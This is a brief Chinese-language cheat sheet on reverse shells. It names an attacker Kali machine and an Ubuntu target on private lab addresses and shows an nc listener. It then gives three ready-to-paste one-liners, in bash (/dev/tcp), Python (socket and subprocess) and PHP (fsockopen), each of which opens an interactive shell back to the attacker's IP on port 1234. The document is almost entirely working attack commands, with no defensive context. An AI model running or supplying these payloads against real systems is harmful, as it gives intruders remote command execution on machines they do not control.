反弹shell方法

准备:

hacker: 192.168.188.63 (kali)
目标: 192.168.72.130 (ubuntu)

kali监听指定端口：

nc -lvp 1234

反弹shell:

ubuntu下

方法一 bash:

bash -i >& /dev/tcp/192.168.188.63/1234 0>&1

方法二 python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.188.63",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

方法三 php：

php -r '$sock=fsockopen("192.168.188.63",1234);exec("/bin/sh -i <&3 >&3 2>&3");'